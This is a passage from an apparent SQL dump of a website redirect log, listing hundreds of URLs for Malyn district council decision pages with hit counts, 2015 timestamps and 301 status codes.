00:00:00',301),(15808,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/241-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi_2','','','',27,0,'2015-10-31 23:08:34','0000-00-00 00:00:00',301),(15809,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/243-pro-pogodzhennja-vvedennja-shtatnoi-odinici?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:08:37','0000-00-00 00:00:00',301),(15810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=ru&limitstart=5','','','',3,0,'2015-10-31 23:08:39','0000-00-00 00:00:00',301),(15811,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/245-pro-vstanovlennja-nadbavki-do-posadovogo-okladu','','','',36,0,'2015-10-31 23:08:39','0000-00-00 00:00:00',301),(15812,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/245-pro-vstanovlennja-nadbavki-do-posadovogo-okladu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 23:08:41','0000-00-00 00:00:00',301),(15813,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/246-pro-zminu-nazvi-navchalnih-zakladiv-rajonu_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:08:43','0000-00-00 00:00:00',301),(15814,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/248-pro-nadannja-pilgi-z-orendnoi-plati-upravlinnju?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:08:46','0000-00-00 00:00:00',301),(15815,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/249-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_3','','','',30,0,'2015-10-31 23:08:48','0000-00-00 00:00:00',301),(15816,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/249-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:08:49','0000-00-00 00:00:00',301),(15817,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/33-pro-nadannja-dozvolu-teritorialnomu-centru?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:08:51','0000-00-00 00:00:00',301),(15818,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/5-pro-zatverdzhennja-tehnichnoi-dokumentacii-po','','','',74,0,'2015-10-31 23:08:53','0000-00-00 00:00:00',301),(15819,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/57-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2011?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:08:55','0000-00-00 00:00:00',301),(15820,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=21','','','',22,0,'2015-10-31 23:17:52','0000-00-00 00:00:00',301),(15821,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=35','','','',18,0,'2015-10-31 23:17:56','0000-00-00 00:00:00',301),(15822,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=7','','','',16,0,'2015-10-31 23:17:57','0000-00-00 00:00:00',301),(15823,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/802-pro-peredachu-avtomobilja-gaz-3110_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:17:59','0000-00-00 00:00:00',301),(15824,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/803-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:18:01','0000-00-00 00:00:00',301),(15825,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/806-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:18:05','0000-00-00 00:00:00',301),(15826,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/807-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_26?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:07','0000-00-00 00:00:00',301),(15827,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/808-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_14?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:08','0000-00-00 00:00:00',301),(15828,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/815-pro-zatverdzhennja-rozmiru-groshovoi-kompensacii?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:18:10','0000-00-00 00:00:00',301),(15829,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/819-pro-vnesennja-zmin-do-rajonnih-program?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:11','0000-00-00 00:00:00',301),(15830,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/827-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_7?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:12','0000-00-00 00:00:00',301),(15831,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/828-pro-stan-zlochinnosti-na-teritorii-malinskogo_2','','','',38,0,'2015-10-31 23:18:14','0000-00-00 00:00:00',301),(15832,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/130-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:15','0000-00-00 00:00:00',301),(15833,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/51-pro-pogodzhennja-klopotannja-shhodo-otrimannja','','','',50,0,'2015-10-31 23:18:20','0000-00-00 00:00:00',301),(15834,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/60-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:21','0000-00-00 00:00:00',301),(15835,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/87-pro-vnesennja-zmin-do-programi-pidtrimki-malogo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:23','0000-00-00 00:00:00',301),(15836,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/88-pro-hid-vikonannja-rajonnoi-programi','','','',125,0,'2015-10-31 23:18:24','0000-00-00 00:00:00',301),(15837,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/89-pro-hid-vikonannja-rajonnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:26','0000-00-00 00:00:00',301),(15838,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/92-pro-hid-vikonannja-cilovoi-rajonnoi-programi','','','',7,0,'2015-10-31 23:18:27','0000-00-00 00:00:00',301),(15839,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/419-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi','','','',7,0,'2015-10-31 23:18:29','0000-00-00 00:00:00',301),(15840,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/420-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2012?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:30','0000-00-00 00:00:00',301),(15841,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/428-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:18:31','0000-00-00 00:00:00',301),(15842,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/436-pro-peredachu-materialnih-cinnostej-z-balansu','','','',11,0,'2015-10-31 23:18:34','0000-00-00 00:00:00',301),(15843,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/446-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:18:37','0000-00-00 00:00:00',301),(15844,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/447-pro-viznachennja-statusu-muzeju-istorii','','','',30,0,'2015-10-31 23:18:38','0000-00-00 00:00:00',301),(15845,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/275-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:18:40','0000-00-00 00:00:00',301),(15846,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/299-pro-nadannja-dozvolu-teritorialnomu-centru_2','','','',12,0,'2015-10-31 23:18:41','0000-00-00 00:00:00',301),(15847,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/328-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:18:43','0000-00-00 00:00:00',301),(15848,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/329-pro-vnesennja-zmin-do-rajonnoi-programi-rozvitku_2','','','',11,0,'2015-10-31 23:18:44','0000-00-00 00:00:00',301),(15849,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/330-pro-vnesennja-zmin-do-rajonnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:18:46','0000-00-00 00:00:00',301),(15850,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/331-pro-hid-vikonannja-rajonnoi-programi-budivnictva','','','',8,0,'2015-10-31 23:18:48','0000-00-00 00:00:00',301),(15851,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/332-pro-hid-vikonannja-rajonnoi-programi_5','','','',13,0,'2015-10-31 23:18:49','0000-00-00 00:00:00',301),(15852,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/333-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:18:51','0000-00-00 00:00:00',301),(15853,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/334-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_3','','','',6,0,'2015-10-31 23:18:53','0000-00-00 00:00:00',301),(15854,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/338-pro-prisvoennja-zvannja-pochesnogo-gromadjanina','','','',9,0,'2015-10-31 23:18:56','0000-00-00 00:00:00',301),(15855,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/339-pro-viznannja-takimi-shho-vtratili-chinnist-rishen?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:18:57','0000-00-00 00:00:00',301),(15856,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/340-pro-zatverdzhennja-polozhennja-pro-porjadok_2','','','',13,0,'2015-10-31 23:18:59','0000-00-00 00:00:00',301),(15857,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/341-pro-zatverdzhennja-polozhennja-pro-orendu-majna_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:19:01','0000-00-00 00:00:00',301),(15858,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/352-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_6','','','',4,0,'2015-10-31 23:19:02','0000-00-00 00:00:00',301),(15859,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/353-pro-likvidaciju-ustinivskoi-zosh-i-st?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:19:04','0000-00-00 00:00:00',301),(15860,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/355-pro-skasuvannja-rishennja-rajonnoi-radi-vid-27-04?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:19:07','0000-00-00 00:00:00',301),(15861,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/596-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_2','','','',11,0,'2015-10-31 23:19:09','0000-00-00 00:00:00',301),(15862,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/597-pro-hid-vikonannja-rajonnoi-cilovoi-programi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:10','0000-00-00 00:00:00',301),(15863,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/599-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_11','','','',7,0,'2015-10-31 23:19:11','0000-00-00 00:00:00',301),(15864,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/600-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:19:13','0000-00-00 00:00:00',301),(15865,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/601-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:19:15','0000-00-00 00:00:00',301),(15866,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/602-pro-hid-vikonannja-rajonnoi-socialnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:19:17','0000-00-00 00:00:00',301),(15867,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/604-pro-nadannja-dozvolu-na-vigotovlennja-proektu','','','',3,0,'2015-10-31 23:19:18','0000-00-00 00:00:00',301),(15868,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/606-pro-hid-vikonannja-rishen-rajonnoi-radi-vid-12?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:20','0000-00-00 00:00:00',301),(15869,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/607-pro-nadannja-dozvolu-na-rozroblennja-detalnogo_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:22','0000-00-00 00:00:00',301),(15870,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/608-pro-prodovzhennja-dii-kontraktu-z-kerivnikom?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:23','0000-00-00 00:00:00',301),(15871,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/609-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:25','0000-00-00 00:00:00',301),(15872,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/610-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_13?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:26','0000-00-00 00:00:00',301),(15873,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/611-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_21?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:28','0000-00-00 00:00:00',301),(15874,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/612-pro-vnesennja-zmin-do-programi-zajnjatosti_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:29','0000-00-00 00:00:00',301),(15875,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/615-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_12?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:31','0000-00-00 00:00:00',301),(15876,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/618-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_13?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:32','0000-00-00 00:00:00',301),(15877,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/623-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_14?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:34','0000-00-00 00:00:00',301),(15878,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/629-pro-peredachu-budivli-lokomotivnogo-depo-na-balans?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:35','0000-00-00 00:00:00',301),(15879,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/153-pro-rozgljad-protestu-prokurora-malinskogo-rajonu','','','',17,0,'2015-10-31 23:19:48','0000-00-00 00:00:00',301),(15880,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/230-pro-vnesennja-zmin-do-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:49','0000-00-00 00:00:00',301),(15881,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/269-pro-vnesennja-zmin-do-rajonnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:51','0000-00-00 00:00:00',301),(15882,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/270-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi_2','','','',10,0,'2015-10-31 23:19:52','0000-00-00 00:00:00',301),(15883,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/271-pro-pogodzhennja-rozmezhuvannja-zemel-derzhavnoi','','','',20,0,'2015-10-31 23:19:54','0000-00-00 00:00:00',301),(15884,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/272-pro-zatverdzhennja-porjadku-vikoristannja-koshtiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:55','0000-00-00 00:00:00',301),(15885,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/273-pro-ne-zaperechennja-shhodo-nadannja-v_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:19:57','0000-00-00 00:00:00',301),(15886,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/274-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_2','','','',18,0,'2015-10-31 23:19:58','0000-00-00 00:00:00',301),(15887,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/278-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro_2','','','',18,0,'2015-10-31 23:20:00','0000-00-00 00:00:00',301),(15888,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/279-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_7?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:01','0000-00-00 00:00:00',301),(15889,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/280-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_11','','','',6,0,'2015-10-31 23:20:03','0000-00-00 00:00:00',301),(15890,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/284-pro-vikoristannja-koshtiv-shho-nadijshli-u?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:05','0000-00-00 00:00:00',301),(15891,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/285-pro-peredachu-neruhomogo-majna-shho-perebuvae-u','','','',6,0,'2015-10-31 23:20:06','0000-00-00 00:00:00',301),(15892,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/651-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_22?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:11','0000-00-00 00:00:00',301),(15893,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/737-pro-zatverdzhennja-programi-polipshennja-stanu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:20:14','0000-00-00 00:00:00',301),(15894,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/783-pro-programu-socialno-ekonomichnogo-rozvitku_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:15','0000-00-00 00:00:00',301),(15895,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/784-pro-vnesennja-zmin-do-programi-vidpochinku-ta_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:17','0000-00-00 00:00:00',301),(15896,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/789-pro-peredachu-budivli-lokomotivnogo-depo-na-balans_2','','','',28,0,'2015-10-31 23:20:19','0000-00-00 00:00:00',301),(15897,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/132-perelik-rishen-prijnjatih-na-5-sesii-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:20:20','0000-00-00 00:00:00',301),(15898,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/133-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_2','','','',9,0,'2015-10-31 23:20:22','0000-00-00 00:00:00',301),(15899,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/157-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:23','0000-00-00 00:00:00',301),(15900,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/158-pro-hid-vikonannja-rajonnoi-programi-rozvitku_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:25','0000-00-00 00:00:00',301),(15901,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/159-pro-hid-vikonannja-rajonnoi-programi-rozvitku_4','','','',40,0,'2015-10-31 23:20:26','0000-00-00 00:00:00',301),(15902,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/169-pro-hid-vikonannja-rajonnoi-programi-reformuvannja','','','',11,0,'2015-10-31 23:20:28','0000-00-00 00:00:00',301),(15903,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/170-pro-zatverdzhennja-rajonnoi-programi-provedennja-u','','','',15,0,'2015-10-31 23:20:29','0000-00-00 00:00:00',301),(15904,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/441-pro-zatverdzhennja-rozmiru-vartosti-produktiv_3','','','',21,0,'2015-10-31 23:20:34','0000-00-00 00:00:00',301),(15905,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/457-pro-vnesennja-zmin-do-programi-zajnjatosti_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:35','0000-00-00 00:00:00',301),(15906,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/458-pro-vnesennja-zmin-do-rajonnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:37','0000-00-00 00:00:00',301),(15907,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/459-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_19?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:38','0000-00-00 00:00:00',301),(15908,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/460-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_11?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:40','0000-00-00 00:00:00',301),(15909,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/468-pro-zatverdzhennja-rajonnoi-cilovoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:41','0000-00-00 00:00:00',301),(15910,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/474-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_5?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:46','0000-00-00 00:00:00',301),(15911,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/481-pro-zminu-nazvi-ta-zatverdzhennja-statutu','','','',18,0,'2015-10-31 23:20:48','0000-00-00 00:00:00',301),(15912,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/487-pro-vikoristannja-koshtiv-shho-nadijshli-u_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:51','0000-00-00 00:00:00',301),(15913,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/12-pro-hid-vikonannja-rajonnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:20:52','0000-00-00 00:00:00',301),(15914,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/123-pro-hid-vikonannja-rajonnoi-programi-ozdorovlennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:54','0000-00-00 00:00:00',301),(15915,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/13-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:20:57','0000-00-00 00:00:00',301),(15916,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/220-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:20:58','0000-00-00 00:00:00',301),(15917,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/254-pro-zatverdzhennja-polozhennja-pro-konkursnij?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:00','0000-00-00 00:00:00',301),(15918,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/258-pro-zatverdzhennja-rozmiru-vartosti-produktiv_2','','','',22,0,'2015-10-31 23:21:01','0000-00-00 00:00:00',301),(15919,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/260-pro-spisannja-osnovnih-zasobiv_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:21:02','0000-00-00 00:00:00',301),(15920,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/261-pro-vnesennja-zmin-do-rishen-rajonnoi-radi-vid-19?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:21:04','0000-00-00 00:00:00',301),(15921,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/263-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 23:21:07','0000-00-00 00:00:00',301),(15922,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/267-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_10?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:09','0000-00-00 00:00:00',301),(15923,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/268-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:21:10','0000-00-00 00:00:00',301),(15924,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/6-pro-zatverdzhennja-porjadku-i-normativiv','','','',11,0,'2015-10-31 23:21:12','0000-00-00 00:00:00',301),(15925,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/7-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 23:21:13','0000-00-00 00:00:00',301),(15926,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/8-pro-zatverdzhennja-metodiki-rozrahunku-orendnoi','','','',14,0,'2015-10-31 23:21:15','0000-00-00 